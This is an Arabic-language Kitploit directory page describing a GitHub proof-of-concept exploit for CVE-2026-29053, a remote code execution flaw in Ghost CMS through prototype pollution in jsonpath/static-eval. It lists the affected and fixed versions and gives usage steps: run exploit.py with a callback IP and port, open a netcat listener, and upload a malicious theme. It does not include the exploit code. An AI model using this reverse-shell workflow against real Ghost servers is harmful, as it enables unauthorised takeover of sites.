Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-29053 — إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد في نظام Ghost CMS عبر تلويث النموذج الأولي في jsonpath وstatic-eval، مع إعداد بيئة قابلة للاستغلال وتعليمات الاستخدام. | Kitploit
أدوات/GitHubGitHub/rootxran/cve-2026-29053
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubrootxran/cve-2026-29053

CVE-2026-29053

إثبات مفهوم لاستغلال تنفيذ الأوامر عن بُعد في نظام Ghost CMS عبر تلويث النموذج الأولي في jsonpath وstatic-eval، مع إعداد بيئة قابلة للاستغلال وتعليمات الاستخدام.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-29053

ثغرة تنفيذ الأوامر عن بُعد (RCE) في Ghost CMS عبر سلسلة النماذج الأولية في jsonpath/static-eval.

معلومات

  • CVE: CVE-2026-29053
  • الإصدارات المتأثرة: Ghost <= 6.19.0 مع jsonpath 1.1.1 + static-eval 2.0.2
  • الإصدار المُصلَح: 6.19.1

عرض توضيحي

CVE-2026-29053.webm

إعداد البيئة القابلة للاستغلال

root@kitploit:~
cd build
./build.sh

طريقة الاستخدام

root@kitploit:~
python3 exploit.py -i <YOUR_IP> -p <PORT>
  1. شغّل مستمعًا: nc -lvnp <PORT>
  2. ارفع malicious-theme.zip إلى Ghost Admin ← Settings ← Design
  • أنشئ صفحة بالرابط rce
  • قم بزيارة /rce/
  • المراجع

    • https://github.com/TryGhost/Ghost/security/advisories/GHSA-cgc2-rcrh-qr5x
    • https://www.endorlabs.com/learn/rce-in-ghost-cms-ghsa-cgc2-rcrh-qr5x
    تنزيل الأداة